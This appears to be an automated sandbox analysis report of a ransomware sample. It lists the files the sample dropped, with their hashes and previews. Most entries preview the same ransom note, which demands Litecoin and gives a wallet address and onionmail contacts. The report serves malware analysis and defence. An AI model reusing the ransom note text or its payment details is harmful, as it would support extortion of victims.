                                                                                                                                                                                                                                                Preview:..8.>(...;......Mj8..Ia.........OOD.u..D.....&...].:>..Q0d.../.k......8.../ZE>.j.[3-..5...q.@.T.rC.V..j:.$y&......u.lR....h.]"-....c.!ja...o..6`......:"........0$.........l.zn......p..T=6..L.wVn..a}.z..88.a.........P.+...n.P..N1....b.9....z{...ty..|..}..S....s.*F...u...X.KV...cR......\+...f........D$F`.1.}..a[l".MM..y65.w..v.."X;.K>.......P.......>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..5.]uu.._..?BT...xw......=..o..\.n...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\descript.ion.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):974
                                                                                                                                                                                                                                                Entropy (8bit):7.780208072872998
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:EL72C4bJnzjoSQBUuaevzSjmJrc0YXUZtwsTjry:3JljhqwO44o0jZtwey
                                                                                                                                                                                                                                                MD5:1CCF08F2278FAABE6CD57903E6DE273A
                                                                                                                                                                                                                                                SHA1:822B698463A6A98C243CE4CB3FDC9BEEC7431883
                                                                                                                                                                                                                                                SHA-256:AB5983295E2C113BF2A25F02F345384F3088C14CF5078FFFB8533225409C8DB2
                                                                                                                                                                                                                                                SHA-512:0149A6D5F4F4B19B073D83C6367CA7023A3524FF0C74E4230EEF4CD9509A9496539E10008DF149E5547692A7ACC7FFEF58B13BF0377A98114972F4F17B64AE8C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..8.>(...;......Mj8..Ia.........OOD.u..D.....&...].:>..Q0d.../.k......8.../ZE>.j.[3-..5...q.@.T.rC.V..j:.$y&......u.lR....h.]"-....c.!ja...o..6`......:"........0$.........l.zn......p..T=6..L.wVn..a}.z..88.a.........P.+...n.P..N1....b.9....z{...ty..|..}..S....s.*F...u...X.KV...cR......\+...f........D$F`.1.}..a[l".MM..y65.w..v.."X;.K>.......P.......>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..5.]uu.._..?BT...xw......=..o..\.n...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\CAN\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\DEU\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\FRA\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\JPN\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\UK\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
